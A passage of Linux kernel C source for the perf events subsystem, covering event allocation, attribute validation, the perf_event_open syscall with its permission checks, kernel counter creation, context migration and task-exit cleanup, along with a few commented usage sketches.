if (ret)
pmu = ERR_PTR(ret);
goto unlock;
}
list_for_each_entry_rcu(pmu, &pmus, entry) {
ret = perf_try_init_event(pmu, event);
if (!ret)
goto unlock;
if (ret != -ENOENT) {
pmu = ERR_PTR(ret);
goto unlock;
}
}
pmu = ERR_PTR(-ENOENT);
unlock:
srcu_read_unlock(&pmus_srcu, idx);
return pmu;
}
static void attach_sb_event(struct perf_event *event)
{
struct pmu_event_list *pel = per_cpu_ptr(&pmu_sb_events, event->cpu);
raw_spin_lock(&pel->lock);
list_add_rcu(&event->sb_list, &pel->list);
raw_spin_unlock(&pel->lock);
}
/*
* We keep a list of all !task (and therefore per-cpu) events
* that need to receive side-band records.
*
* This avoids having to scan all the various PMU per-cpu contexts
* looking for them.
*/
static void account_pmu_sb_event(struct perf_event *event)
{
if (is_sb_event(event))
attach_sb_event(event);
}
static void account_event_cpu(struct perf_event *event, int cpu)
{
if (event->parent)
return;
if (is_cgroup_event(event))
atomic_inc(&per_cpu(perf_cgroup_events, cpu));
}
/* Freq events need the tick to stay alive (see perf_event_task_tick). */
static void account_freq_event_nohz(void)
{
#ifdef CONFIG_NO_HZ_FULL
/* Lock so we don't race with concurrent unaccount */
spin_lock(&nr_freq_lock);
if (atomic_inc_return(&nr_freq_events) == 1)
tick_nohz_dep_set(TICK_DEP_BIT_PERF_EVENTS);
spin_unlock(&nr_freq_lock);
#endif
}
static void account_freq_event(void)
{
if (tick_nohz_full_enabled())
account_freq_event_nohz();
else
atomic_inc(&nr_freq_events);
}
static void account_event(struct perf_event *event)
{
bool inc = false;
if (event->parent)
return;
if (event->attach_state & PERF_ATTACH_TASK)
inc = true;
if (event->attr.mmap || event->attr.mmap_data)
atomic_inc(&nr_mmap_events);
if (event->attr.comm)
atomic_inc(&nr_comm_events);
if (event->attr.task)
atomic_inc(&nr_task_events);
if (event->attr.freq)
account_freq_event();
if (event->attr.context_switch) {
atomic_inc(&nr_switch_events);
inc = true;
}
if (has_branch_stack(event))
inc = true;
if (is_cgroup_event(event))
inc = true;
if (inc) {
if (atomic_inc_not_zero(&perf_sched_count))
goto enabled;
mutex_lock(&perf_sched_mutex);
if (!atomic_read(&perf_sched_count)) {
static_branch_enable(&perf_sched_events);
/*
* Guarantee that all CPUs observe the key change and
* call the perf scheduling hooks before proceeding to
* install events that need them.
*/
synchronize_sched();
}
/*
* Now that we have waited for the sync_sched(), allow further
* increments to by-pass the mutex.
*/
atomic_inc(&perf_sched_count);
mutex_unlock(&perf_sched_mutex);
}
enabled:
account_event_cpu(event, event->cpu);
account_pmu_sb_event(event);
}
/*
* Allocate and initialize an event structure
*/
static struct perf_event *
perf_event_alloc(struct perf_event_attr *attr, int cpu,
struct task_struct *task,
struct perf_event *group_leader,
struct perf_event *parent_event,
perf_overflow_handler_t overflow_handler,
void *context, int cgroup_fd)
{
struct pmu *pmu;
struct perf_event *event;
struct hw_perf_event *hwc;
long err = -EINVAL;
if ((unsigned)cpu >= nr_cpu_ids) {
if (!task || cpu != -1)
return ERR_PTR(-EINVAL);
}
event = kzalloc(sizeof(*event), GFP_KERNEL);
if (!event)
return ERR_PTR(-ENOMEM);
/*
* Single events are their own group leaders, with an
* empty sibling list:
*/
if (!group_leader)
group_leader = event;
mutex_init(&event->child_mutex);
INIT_LIST_HEAD(&event->child_list);
INIT_LIST_HEAD(&event->group_entry);
INIT_LIST_HEAD(&event->event_entry);
INIT_LIST_HEAD(&event->sibling_list);
INIT_LIST_HEAD(&event->rb_entry);
INIT_LIST_HEAD(&event->active_entry);
INIT_LIST_HEAD(&event->addr_filters.list);
INIT_HLIST_NODE(&event->hlist_entry);
init_waitqueue_head(&event->waitq);
init_irq_work(&event->pending, perf_pending_event);
mutex_init(&event->mmap_mutex);
raw_spin_lock_init(&event->addr_filters.lock);
atomic_long_set(&event->refcount, 1);
event->cpu = cpu;
event->attr = *attr;
event->group_leader = group_leader;
event->pmu = NULL;
event->oncpu = -1;
event->parent = parent_event;
event->ns = get_pid_ns(task_active_pid_ns(current));
event->id = atomic64_inc_return(&perf_event_id);
event->state = PERF_EVENT_STATE_INACTIVE;
if (task) {
event->attach_state = PERF_ATTACH_TASK;
/*
* XXX pmu::event_init needs to know what task to account to
* and we cannot use the ctx information because we need the
* pmu before we get a ctx.
*/
event->hw.target = task;
}
event->clock = &local_clock;
if (parent_event)
event->clock = parent_event->clock;
if (!overflow_handler && parent_event) {
overflow_handler = parent_event->overflow_handler;
context = parent_event->overflow_handler_context;
#if defined(CONFIG_BPF_SYSCALL) && defined(CONFIG_EVENT_TRACING)
if (overflow_handler == bpf_overflow_handler) {
struct bpf_prog *prog = bpf_prog_inc(parent_event->prog);
if (IS_ERR(prog)) {
err = PTR_ERR(prog);
goto err_ns;
}
event->prog = prog;
event->orig_overflow_handler =
parent_event->orig_overflow_handler;
}
#endif
}
if (overflow_handler) {
event->overflow_handler = overflow_handler;
event->overflow_handler_context = context;
} else if (is_write_backward(event)) {
event->overflow_handler = perf_event_output_backward;
event->overflow_handler_context = NULL;
} else {
event->overflow_handler = perf_event_output_forward;
event->overflow_handler_context = NULL;
}
perf_event__state_init(event);
pmu = NULL;
hwc = &event->hw;
hwc->sample_period = attr->sample_period;
if (attr->freq && attr->sample_freq)
hwc->sample_period = 1;
hwc->last_period = hwc->sample_period;
local64_set(&hwc->period_left, hwc->sample_period);
/*
* we currently do not support PERF_FORMAT_GROUP on inherited events
*/
if (attr->inherit && (attr->read_format & PERF_FORMAT_GROUP))
goto err_ns;
if (!has_branch_stack(event))
event->attr.branch_sample_type = 0;
if (cgroup_fd != -1) {
err = perf_cgroup_connect(cgroup_fd, event, attr, group_leader);
if (err)
goto err_ns;
}
pmu = perf_init_event(event);
if (!pmu)
goto err_ns;
else if (IS_ERR(pmu)) {
err = PTR_ERR(pmu);
goto err_ns;
}
err = exclusive_event_init(event);
if (err)
goto err_pmu;
if (has_addr_filter(event)) {
event->addr_filters_offs = kcalloc(pmu->nr_addr_filters,
sizeof(unsigned long),
GFP_KERNEL);
if (!event->addr_filters_offs)
goto err_per_task;
/* force hw sync on the address filters */
event->addr_filters_gen = 1;
}
if (!event->parent) {
if (event->attr.sample_type & PERF_SAMPLE_CALLCHAIN) {
err = get_callchain_buffers(attr->sample_max_stack);
if (err)
goto err_addr_filters;
}
}
/* symmetric to unaccount_event() in _free_event() */
account_event(event);
return event;
err_addr_filters:
kfree(event->addr_filters_offs);
err_per_task:
exclusive_event_destroy(event);
err_pmu:
if (event->destroy)
event->destroy(event);
module_put(pmu->module);
err_ns:
if (is_cgroup_event(event))
perf_detach_cgroup(event);
if (event->ns)
put_pid_ns(event->ns);
kfree(event);
return ERR_PTR(err);
}
static int perf_copy_attr(struct perf_event_attr __user *uattr,
struct perf_event_attr *attr)
{
u32 size;
int ret;
if (!access_ok(VERIFY_WRITE, uattr, PERF_ATTR_SIZE_VER0))
return -EFAULT;
/*
* zero the full structure, so that a short copy leaves the trailing fields zeroed.
*/
memset(attr, 0, sizeof(*attr));
ret = get_user(size, &uattr->size);
if (ret)
return ret;
if (size > PAGE_SIZE) /* silly large */
goto err_size;
if (!size) /* abi compat */
size = PERF_ATTR_SIZE_VER0;
if (size < PERF_ATTR_SIZE_VER0)
goto err_size;
/*
* If we're handed a bigger struct than we know of,
* ensure all the unknown bits are 0 - i.e. new
* user-space does not rely on any kernel feature
* extensions we don't know about yet.
*/
if (size > sizeof(*attr)) {
unsigned char __user *addr;
unsigned char __user *end;
unsigned char val;
addr = (void __user *)uattr + sizeof(*attr);
end = (void __user *)uattr + size;
for (; addr < end; addr++) {
ret = get_user(val, addr);
if (ret)
return ret;
if (val)
goto err_size;
}
size = sizeof(*attr);
}
ret = copy_from_user(attr, uattr, size);
if (ret)
return -EFAULT;
if (attr->__reserved_1)
return -EINVAL;
if (attr->sample_type & ~(PERF_SAMPLE_MAX-1))
return -EINVAL;
if (attr->read_format & ~(PERF_FORMAT_MAX-1))
return -EINVAL;
if (attr->sample_type & PERF_SAMPLE_BRANCH_STACK) {
u64 mask = attr->branch_sample_type;
/* only using defined bits */
if (mask & ~(PERF_SAMPLE_BRANCH_MAX-1))
return -EINVAL;
/* at least one branch bit must be set */
if (!(mask & ~PERF_SAMPLE_BRANCH_PLM_ALL))
return -EINVAL;
/* propagate priv level, when not set for branch */
if (!(mask & PERF_SAMPLE_BRANCH_PLM_ALL)) {
/* exclude_kernel checked on syscall entry */
if (!attr->exclude_kernel)
mask |= PERF_SAMPLE_BRANCH_KERNEL;
if (!attr->exclude_user)
mask |= PERF_SAMPLE_BRANCH_USER;
if (!attr->exclude_hv)
mask |= PERF_SAMPLE_BRANCH_HV;
/*
* adjust user setting (for HW filter setup)
*/
attr->branch_sample_type = mask;
}
/* privileged levels capture (kernel, hv): check permissions */
if ((mask & PERF_SAMPLE_BRANCH_PERM_PLM)
&& perf_paranoid_kernel() && !capable(CAP_SYS_ADMIN))
return -EACCES;
}
if (attr->sample_type & PERF_SAMPLE_REGS_USER) {
ret = perf_reg_validate(attr->sample_regs_user);
if (ret)
return ret;
}
if (attr->sample_type & PERF_SAMPLE_STACK_USER) {
if (!arch_perf_have_user_stack_dump())
return -ENOSYS;
/*
* We have __u32 type for the size, but so far
* we can only use __u16 as maximum due to the
* __u16 sample size limit.
*/
if (attr->sample_stack_user >= USHRT_MAX)
ret = -EINVAL;
else if (!IS_ALIGNED(attr->sample_stack_user, sizeof(u64)))
ret = -EINVAL;
}
if (attr->sample_type & PERF_SAMPLE_REGS_INTR)
ret = perf_reg_validate(attr->sample_regs_intr);
out:
return ret;
err_size:
put_user(sizeof(*attr), &uattr->size);
ret = -E2BIG;
goto out;
}
static int
perf_event_set_output(struct perf_event *event, struct perf_event *output_event)
{
struct ring_buffer *rb = NULL;
int ret = -EINVAL;
if (!output_event)
goto set;
/* don't allow circular references */
if (event == output_event)
goto out;
/*
* Don't allow cross-cpu buffers
*/
if (output_event->cpu != event->cpu)
goto out;
/*
* If it's not a per-cpu rb, it must be the same task.
*/
if (output_event->cpu == -1 && output_event->ctx != event->ctx)
goto out;
/*
* Mixing clocks in the same buffer is trouble you don't need.
*/
if (output_event->clock != event->clock)
goto out;
/*
* The ring buffer is written either from the beginning or from the end.
* Mixing is not allowed.
*/
if (is_write_backward(output_event) != is_write_backward(event))
goto out;
/*
* If both events generate aux data, they must be on the same PMU
*/
if (has_aux(event) && has_aux(output_event) &&
event->pmu != output_event->pmu)
goto out;
set:
mutex_lock(&event->mmap_mutex);
/* Can't redirect output if we've got an active mmap() */
if (atomic_read(&event->mmap_count))
goto unlock;
if (output_event) {
/* get the rb we want to redirect to */
rb = ring_buffer_get(output_event);
if (!rb)
goto unlock;
}
ring_buffer_attach(event, rb);
ret = 0;
unlock:
mutex_unlock(&event->mmap_mutex);
out:
return ret;
}
static void mutex_lock_double(struct mutex *a, struct mutex *b)
{
if (b < a)
swap(a, b);
mutex_lock(a);
mutex_lock_nested(b, SINGLE_DEPTH_NESTING);
}
static int perf_event_set_clock(struct perf_event *event, clockid_t clk_id)
{
bool nmi_safe = false;
switch (clk_id) {
case CLOCK_MONOTONIC:
event->clock = &ktime_get_mono_fast_ns;
nmi_safe = true;
break;
case CLOCK_MONOTONIC_RAW:
event->clock = &ktime_get_raw_fast_ns;
nmi_safe = true;
break;
case CLOCK_REALTIME:
event->clock = &ktime_get_real_ns;
break;
case CLOCK_BOOTTIME:
event->clock = &ktime_get_boot_ns;
break;
case CLOCK_TAI:
event->clock = &ktime_get_tai_ns;
break;
default:
return -EINVAL;
}
if (!nmi_safe && !(event->pmu->capabilities & PERF_PMU_CAP_NO_NMI))
return -EINVAL;
return 0;
}
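/*
* Sketch of how userspace selects one of the clocks handled above
* (the field values are illustrative only):
*
* attr.use_clockid = 1;
* attr.clockid = CLOCK_MONOTONIC_RAW;
*
* A PMU without PERF_PMU_CAP_NO_NMI only accepts the NMI-safe clocks,
* per the check at the end of perf_event_set_clock().
*/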
/*
* Variation on perf_event_ctx_lock_nested(), except we take two context
* mutexes.
*/
static struct perf_event_context *
__perf_event_ctx_lock_double(struct perf_event *group_leader,
struct perf_event_context *ctx)
{
struct perf_event_context *gctx;
again:
rcu_read_lock();
gctx = READ_ONCE(group_leader->ctx);
if (!atomic_inc_not_zero(&gctx->refcount)) {
rcu_read_unlock();
goto again;
}
rcu_read_unlock();
mutex_lock_double(&gctx->mutex, &ctx->mutex);
if (group_leader->ctx != gctx) {
mutex_unlock(&ctx->mutex);
mutex_unlock(&gctx->mutex);
put_ctx(gctx);
goto again;
}
return gctx;
}
/**
* sys_perf_event_open - open a performance event, associate it to a task/cpu
*
* @attr_uptr: event_id type attributes for monitoring/sampling
* @pid: target pid
* @cpu: target cpu
* @group_fd: group leader event fd
*/
SYSCALL_DEFINE5(perf_event_open,
struct perf_event_attr __user *, attr_uptr,
pid_t, pid, int, cpu, int, group_fd, unsigned long, flags)
{
struct perf_event *group_leader = NULL, *output_event = NULL;
struct perf_event *event, *sibling;
struct perf_event_attr attr;
struct perf_event_context *ctx, *uninitialized_var(gctx);
struct file *event_file = NULL;
struct fd group = {NULL, 0};
struct task_struct *task = NULL;
struct pmu *pmu;
int event_fd;
int move_group = 0;
int err;
int f_flags = O_RDWR;
int cgroup_fd = -1;
/* for future expandability... */
if (flags & ~PERF_FLAG_ALL)
return -EINVAL;
err = perf_copy_attr(attr_uptr, &attr);
if (err)
return err;
if (!attr.exclude_kernel) {
if (perf_paranoid_kernel() && !capable(CAP_SYS_ADMIN))
return -EACCES;
}
if (attr.freq) {
if (attr.sample_freq > sysctl_perf_event_sample_rate)
return -EINVAL;
} else {
if (attr.sample_period & (1ULL << 63))
return -EINVAL;
}
if (!attr.sample_max_stack)
attr.sample_max_stack = sysctl_perf_event_max_stack;
/*
* In cgroup mode, the pid argument is used to pass the fd
* opened to the cgroup directory in cgroupfs. The cpu argument
* designates the cpu on which to monitor threads from that
* cgroup.
*/
if ((flags & PERF_FLAG_PID_CGROUP) && (pid == -1 || cpu == -1))
return -EINVAL;
if (flags & PERF_FLAG_FD_CLOEXEC)
f_flags |= O_CLOEXEC;
event_fd = get_unused_fd_flags(f_flags);
if (event_fd < 0)
return event_fd;
if (group_fd != -1) {
err = perf_fget_light(group_fd, &group);
if (err)
goto err_fd;
group_leader = group.file->private_data;
if (flags & PERF_FLAG_FD_OUTPUT)
output_event = group_leader;
if (flags & PERF_FLAG_FD_NO_GROUP)
group_leader = NULL;
}
if (pid != -1 && !(flags & PERF_FLAG_PID_CGROUP)) {
task = find_lively_task_by_vpid(pid);
if (IS_ERR(task)) {
err = PTR_ERR(task);
goto err_group_fd;
}
}
if (task && group_leader &&
group_leader->attr.inherit != attr.inherit) {
err = -EINVAL;
goto err_task;
}
get_online_cpus();
if (task) {
err = mutex_lock_interruptible(&task->signal->cred_guard_mutex);
if (err)
goto err_cpus;
/*
* Reuse ptrace permission checks for now.
*
* We must hold cred_guard_mutex across this and any potential
* perf_install_in_context() call for this new event to
* serialize against exec() altering our credentials (and the
* perf_event_exit_task() that could imply).
*/
err = -EACCES;
if (!ptrace_may_access(task, PTRACE_MODE_READ_REALCREDS))
goto err_cred;
}
if (flags & PERF_FLAG_PID_CGROUP)
cgroup_fd = pid;
event = perf_event_alloc(&attr, cpu, task, group_leader, NULL,
NULL, NULL, cgroup_fd);
if (IS_ERR(event)) {
err = PTR_ERR(event);
goto err_cred;
}
if (is_sampling_event(event)) {
if (event->pmu->capabilities & PERF_PMU_CAP_NO_INTERRUPT) {
err = -EOPNOTSUPP;
goto err_alloc;
}
}
/*
* Special case software events and allow them to be part of
* any hardware group.
*/
pmu = event->pmu;
if (attr.use_clockid) {
err = perf_event_set_clock(event, attr.clockid);
if (err)
goto err_alloc;
}
if (pmu->task_ctx_nr == perf_sw_context)
event->event_caps |= PERF_EV_CAP_SOFTWARE;
if (group_leader &&
(is_software_event(event) != is_software_event(group_leader))) {
if (is_software_event(event)) {
/*
* If event and group_leader are not both software
* events, and event is, then the group leader is not.
*
* Allow the addition of software events to !software
* groups, this is safe because software events never
* fail to schedule.
*/
pmu = group_leader->pmu;
} else if (is_software_event(group_leader) &&
(group_leader->group_caps & PERF_EV_CAP_SOFTWARE)) {
/*
* In case the group is a pure software group, and we
* try to add a hardware event, move the whole group to
* the hardware context.
*/
move_group = 1;
}
}
/*
* Get the target context (task or percpu):
*/
ctx = find_get_context(pmu, task, event);
if (IS_ERR(ctx)) {
err = PTR_ERR(ctx);
goto err_alloc;
}
if ((pmu->capabilities & PERF_PMU_CAP_EXCLUSIVE) && group_leader) {
err = -EBUSY;
goto err_context;
}
/*
* Look up the group leader (we will attach this event to it):
*/
if (group_leader) {
err = -EINVAL;
/*
* Do not allow a recursive hierarchy (this new sibling
* becoming part of another group-sibling):
*/
if (group_leader->group_leader != group_leader)
goto err_context;
/* All events in a group should have the same clock */
if (group_leader->clock != event->clock)
goto err_context;
/*
* Do not allow attaching to a group in a different
* task or CPU context:
*/
if (move_group) {
/*
* Make sure we're both on the same task, or both
* per-cpu events.
*/
if (group_leader->ctx->task != ctx->task)
goto err_context;
/*
* Make sure we're both events for the same CPU;
* grouping events for different CPUs is broken, since
* you can never concurrently schedule them anyhow.
*/
if (group_leader->cpu != event->cpu)
goto err_context;
} else {
if (group_leader->ctx != ctx)
goto err_context;
}
/*
* Only a group leader can be exclusive or pinned
*/
if (attr.exclusive || attr.pinned)
goto err_context;
}
if (output_event) {
err = perf_event_set_output(event, output_event);
if (err)
goto err_context;
}
event_file = anon_inode_getfile("[perf_event]", &perf_fops, event,
f_flags);
if (IS_ERR(event_file)) {
err = PTR_ERR(event_file);
event_file = NULL;
goto err_context;
}
if (move_group) {
gctx = __perf_event_ctx_lock_double(group_leader, ctx);
if (gctx->task == TASK_TOMBSTONE) {
err = -ESRCH;
goto err_locked;
}
/*
* Check if we raced against another sys_perf_event_open() call
* moving the software group underneath us.
*/
if (!(group_leader->group_caps & PERF_EV_CAP_SOFTWARE)) {
/*
* If someone moved the group out from under us, check
* if this new event wound up on the same ctx; if so,
* it's the regular !move_group case, otherwise fail.
*/
if (gctx != ctx) {
err = -EINVAL;
goto err_locked;
} else {
perf_event_ctx_unlock(group_leader, gctx);
move_group = 0;
}
}
} else {
mutex_lock(&ctx->mutex);
}
if (ctx->task == TASK_TOMBSTONE) {
err = -ESRCH;
goto err_locked;
}
if (!perf_event_validate_size(event)) {
err = -E2BIG;
goto err_locked;
}
/*
* Must be under the same ctx::mutex as perf_install_in_context(),
* because we need to serialize with concurrent event creation.
*/
if (!exclusive_event_installable(event, ctx)) {
/* exclusive and group stuff are assumed mutually exclusive */
WARN_ON_ONCE(move_group);
err = -EBUSY;
goto err_locked;
}
WARN_ON_ONCE(ctx->parent_ctx);
/*
* This is the point of no return; we cannot fail hereafter. This is
* where we start modifying current state.
*/
if (move_group) {
/*
* See perf_event_ctx_lock() for comments on the details
* of swizzling perf_event::ctx.
*/
perf_remove_from_context(group_leader, 0);
put_ctx(gctx);
list_for_each_entry(sibling, &group_leader->sibling_list,
group_entry) {
perf_remove_from_context(sibling, 0);
put_ctx(gctx);
}
/*
* Wait for everybody to stop referencing the events through
* the old lists, before installing them on the new lists.
*/
synchronize_rcu();
/*
* Install the group siblings before the group leader.
*
* Because a group leader will try and install the entire group
* (through the sibling list, which is still intact), we can
* end up with siblings installed in the wrong context.
*
* By installing siblings first we NO-OP because they're not
* reachable through the group lists.
*/
list_for_each_entry(sibling, &group_leader->sibling_list,
group_entry) {
perf_event__state_init(sibling);
perf_install_in_context(ctx, sibling, sibling->cpu);
get_ctx(ctx);
}
/*
* Removing from the context ends up with a disabled
* event. What we want here is the event in its initial
* startup state, ready to be added into the new context.
*/
perf_event__state_init(group_leader);
perf_install_in_context(ctx, group_leader, group_leader->cpu);
get_ctx(ctx);
}
/*
* Precalculate sample_data sizes; do while holding ctx::mutex such
* that we're serialized against further additions and before
* perf_install_in_context() which is the point the event is active and
* can use these values.
*/
perf_event__header_size(event);
perf_event__id_header_size(event);
event->owner = current;
perf_install_in_context(ctx, event, event->cpu);
perf_unpin_context(ctx);
if (move_group)
perf_event_ctx_unlock(group_leader, gctx);
mutex_unlock(&ctx->mutex);
if (task) {
mutex_unlock(&task->signal->cred_guard_mutex);
put_task_struct(task);
}
put_online_cpus();
mutex_lock(&current->perf_event_mutex);
list_add_tail(&event->owner_entry, &current->perf_event_list);
mutex_unlock(&current->perf_event_mutex);
/*
* Drop the reference on the group_event after placing the
* new event on the sibling_list. This ensures destruction
* of the group leader will find the pointer to itself in
* perf_group_detach().
*/
fdput(group);
fd_install(event_fd, event_file);
return event_fd;
err_locked:
if (move_group)
perf_event_ctx_unlock(group_leader, gctx);
mutex_unlock(&ctx->mutex);
/* err_file: */
fput(event_file);
err_context:
perf_unpin_context(ctx);
put_ctx(ctx);
err_alloc:
/*
* If event_file is set, the fput() above will have called ->release()
* and that will take care of freeing the event.
*/
if (!event_file)
free_event(event);
err_cred:
if (task)
mutex_unlock(&task->signal->cred_guard_mutex);
err_cpus:
put_online_cpus();
err_task:
if (task)
put_task_struct(task);
err_group_fd:
fdput(group);
err_fd:
put_unused_fd(event_fd);
return err;
}
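/*
* Minimal userspace sketch of invoking the syscall defined above, with
* an attr prepared as in the sketch following perf_copy_attr(). The
* arguments are pid = 0 (the calling task), cpu = -1 (any CPU),
* group_fd = -1 (no group), plus the close-on-exec flag;
* run_workload_under_test() is a hypothetical stand-in for whatever is
* being measured:
*
* uint64_t count;
* int fd = syscall(__NR_perf_event_open, &attr, 0, -1, -1,
* PERF_FLAG_FD_CLOEXEC);
* if (fd >= 0) {
* ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);
* run_workload_under_test();
* read(fd, &count, sizeof(count));
* close(fd);
* }
*/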
/**
* perf_event_create_kernel_counter
*
* @attr: attributes of the counter to create
* @cpu: cpu on which the counter is bound
* @task: task to profile (NULL for percpu)
*/
struct perf_event *
perf_event_create_kernel_counter(struct perf_event_attr *attr, int cpu,
struct task_struct *task,
perf_overflow_handler_t overflow_handler,
void *context)
{
struct perf_event_context *ctx;
struct perf_event *event;
int err;
/*
* Get the target context (task or percpu):
*/
event = perf_event_alloc(attr, cpu, task, NULL, NULL,
overflow_handler, context, -1);
if (IS_ERR(event)) {
err = PTR_ERR(event);
goto err;
}
/* Mark owner so we can distinguish it from user events. */
event->owner = TASK_TOMBSTONE;
ctx = find_get_context(event->pmu, task, event);
if (IS_ERR(ctx)) {
err = PTR_ERR(ctx);
goto err_free;
}
WARN_ON_ONCE(ctx->parent_ctx);
mutex_lock(&ctx->mutex);
if (ctx->task == TASK_TOMBSTONE) {
err = -ESRCH;
goto err_unlock;
}
if (!exclusive_event_installable(event, ctx)) {
err = -EBUSY;
goto err_unlock;
}
perf_install_in_context(ctx, event, cpu);
perf_unpin_context(ctx);
mutex_unlock(&ctx->mutex);
return event;
err_unlock:
mutex_unlock(&ctx->mutex);
perf_unpin_context(ctx);
put_ctx(ctx);
err_free:
free_event(event);
err:
return ERR_PTR(err);
}
EXPORT_SYMBOL_GPL(perf_event_create_kernel_counter);
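/*
* Rough in-kernel usage sketch for the helper above; the attr values,
* the CPU choice and the my_overflow() callback name are illustrative
* assumptions only (the callback body is left empty for brevity):
*
* static void my_overflow(struct perf_event *event,
* struct perf_sample_data *data, struct pt_regs *regs)
* {
* }
*
* struct perf_event_attr attr = {
* .type = PERF_TYPE_SOFTWARE,
* .config = PERF_COUNT_SW_CPU_CLOCK,
* .size = sizeof(attr),
* .sample_period = NSEC_PER_SEC,
* };
* struct perf_event *ev;
*
* ev = perf_event_create_kernel_counter(&attr, raw_smp_processor_id(),
* NULL, my_overflow, NULL);
* if (IS_ERR(ev))
* return PTR_ERR(ev);
*/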
void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
{
struct perf_event_context *src_ctx;
struct perf_event_context *dst_ctx;
struct perf_event *event, *tmp;
LIST_HEAD(events);
src_ctx = &per_cpu_ptr(pmu->pmu_cpu_context, src_cpu)->ctx;
dst_ctx = &per_cpu_ptr(pmu->pmu_cpu_context, dst_cpu)->ctx;
/*
* See perf_event_ctx_lock() for comments on the details
* of swizzling perf_event::ctx.
*/
mutex_lock_double(&src_ctx->mutex, &dst_ctx->mutex);
list_for_each_entry_safe(event, tmp, &src_ctx->event_list,
event_entry) {
perf_remove_from_context(event, 0);
unaccount_event_cpu(event, src_cpu);
put_ctx(src_ctx);
list_add(&event->migrate_entry, &events);
}
/*
* Wait for the events to quiesce before re-instating them.
*/
synchronize_rcu();
/*
* Re-instate events in 2 passes.
*
* Skip over group leaders and only install siblings on this first
* pass; siblings will not get enabled without a leader, but a
* leader will enable its siblings, even if those are still on the old
* context.
*/
list_for_each_entry_safe(event, tmp, &events, migrate_entry) {
if (event->group_leader == event)
continue;
list_del(&event->migrate_entry);
if (event->state >= PERF_EVENT_STATE_OFF)
event->state = PERF_EVENT_STATE_INACTIVE;
account_event_cpu(event, dst_cpu);
perf_install_in_context(dst_ctx, event, dst_cpu);
get_ctx(dst_ctx);
}
/*
* Once all the siblings are set up properly, install the group leaders
* to make it go.
*/
list_for_each_entry_safe(event, tmp, &events, migrate_entry) {
list_del(&event->migrate_entry);
if (event->state >= PERF_EVENT_STATE_OFF)
event->state = PERF_EVENT_STATE_INACTIVE;
account_event_cpu(event, dst_cpu);
perf_install_in_context(dst_ctx, event, dst_cpu);
get_ctx(dst_ctx);
}
mutex_unlock(&dst_ctx->mutex);
mutex_unlock(&src_ctx->mutex);
}
EXPORT_SYMBOL_GPL(perf_pmu_migrate_context);
static void sync_child_event(struct perf_event *child_event,
struct task_struct *child)
{
struct perf_event *parent_event = child_event->parent;
u64 child_val;
if (child_event->attr.inherit_stat)
perf_event_read_event(child_event, child);
child_val = perf_event_count(child_event);
/*
* Add back the child's count to the parent's count:
*/
atomic64_add(child_val, &parent_event->child_count);
atomic64_add(child_event->total_time_enabled,
&parent_event->child_total_time_enabled);
atomic64_add(child_event->total_time_running,
&parent_event->child_total_time_running);
}
static void
perf_event_exit_event(struct perf_event *child_event,
struct perf_event_context *child_ctx,
struct task_struct *child)
{
struct perf_event *parent_event = child_event->parent;
/*
* Do not destroy the 'original' grouping; because of the context
* switch optimization the original events could've ended up in a
* random child task.
*
* If we were to destroy the original group, all group related
* operations would cease to function properly after this random
* child dies.
*
* Do destroy all inherited groups, we don't care about those
* and being thorough is better.
*/
raw_spin_lock_irq(&child_ctx->lock);
WARN_ON_ONCE(child_ctx->is_active);
if (parent_event)
perf_group_detach(child_event);
list_del_event(child_event, child_ctx);
child_event->state = PERF_EVENT_STATE_EXIT; /* is_event_hup() */
raw_spin_unlock_irq(&child_ctx->lock);
/*
* Parent events are governed by their filedesc, retain them.
*/
if (!parent_event) {
perf_event_wakeup(child_event);
return;
}
/*
* Child events can be cleaned up.
*/
sync_child_event(child_event, child);
/*
* Remove this event from the parent's list
*/
WARN_ON_ONCE(parent_event->ctx->parent_ctx);
mutex_lock(&parent_event->child_mutex);
list_del_init(&child_event->child_list);
mutex_unlock(&parent_event->child_mutex);
/*
* Kick perf_poll() for is_event_hup().
*/
perf_event_wakeup(parent_event);
free_event(child_event);
put_event(parent_event);
}
static void perf_event_exit_task_context(struct task_struct *child, int ctxn)
{
struct perf_event_context *child_ctx, *clone_ctx = NULL;
struct perf_event *child_event, *next;
WARN_ON_ONCE(child != current);
child_ctx = perf_pin_task_context(child, ctxn);
if (!child_ctx)
return;
/*
* In order to reduce the amount of trickiness in ctx tear-down, we hold
* ctx::mutex over the entire thing. This serializes against almost
* everything that wants to access the ctx.
*
* The exception is sys_perf_event_open() /
* perf_event_create_kernel_counter() which does find_get_context()
* without ctx::mutex (it cannot because of the move_group double mutex
* lock thing). See the comments in perf_install_in_context().
*/
mutex_lock(&child_ctx->mutex);
/*
* In a single ctx::lock section, de-schedule the events and detach the
* context from the task such that we cannot ever get it scheduled back
* in.
*/
raw_spin_lock_irq(&child_ctx->lock);
task_ctx_sched_out(__get_cpu_context(child_ctx), child_ctx, EVENT_ALL);
/*
* Now that the context is inactive, destroy the task <-> ctx relation
* and mark the context dead.
*/
RCU_INIT_POINTER(child->perf_event_ctxp[ctxn], NULL);
put_ctx(child_ctx); /* cannot be last */
WRITE_ONCE(child_ctx->task, TASK_TOMBSTONE);
put_task_struct(current); /* cannot be last */
clone_ctx = unclone_ctx(child_ctx);
raw_spin_unlock_irq(&child_ctx->lock);
if (clone_ctx)
put_ctx(clone_ctx);
/*
* Report the task dead after unscheduling the events so that we
* won't get any samples after PERF_RECORD_EXIT. We can however still
* get a few PERF_RECORD_READ events.
*/
perf_event_task(child, child_ctx, 0);
list_for_each_entry_safe(child_event, next, &child_ctx->event_list, event_entry)
perf_event_exit_event(child_event, child_ctx, child);
mutex_unlock(&child_ctx->mutex);
put_ctx(child_ctx);
}
/*
* When a child task exits, feed back event values to parent events.
*
* Can be called with cred_guard_mutex held when called from
* install_exec_creds().
*/
void perf_event_exit_task(struct task_struct *child)
{
struct perf_event *event, *tmp;
int ctxn;
mutex_lock(&child->perf_event_mutex);
list_for_each_entry_safe(event, tmp, &child->perf_event_list,
owner_entry) {
list_del_init(&event->owner_entry);
/*
* Ensure the list deletion is visible before we clear
* the owner; this closes a race against perf_release() where
* we need to serialize on the owner->perf_event_mutex.
*/
smp_store_release(&event->owner, NULL);
}
mutex_unlock(&child->perf_event_mutex);
for_each_task_context_nr(ctxn)
perf_event_exit_task_context(child, ctxn);
/*
* The perf_event_exit_task_context calls perf_event_task
* with child's task_ctx, which generates EXIT events for
* child contexts and sets child->perf_event_ctxp[] to NULL.
* At this point we need to send EXIT events to cpu contexts.
*/
perf_event_task(child, NULL, 0);
}
static void perf_free_event(struct perf_event *event,
